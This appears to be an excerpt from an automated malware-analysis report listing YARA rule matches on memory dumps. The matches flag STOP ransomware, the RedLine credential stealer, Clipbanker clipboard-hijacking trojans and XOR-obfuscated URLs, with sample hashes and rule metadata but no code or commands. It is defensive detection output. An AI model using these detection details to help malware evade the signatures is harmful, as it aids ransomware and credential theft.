Source: 00000007.00000002.350733876.0000000002105000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000000.347198189.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000000.347198189.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000002.347163945.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000002.347163945.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000006.00000000.321377469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000002.351892792.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.304747895.000000000218B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.301522504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.349827384.00000000004B9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.348844154.000000000210E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000002.373204030.00000000020F3000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.564552396.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000002.564552396.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
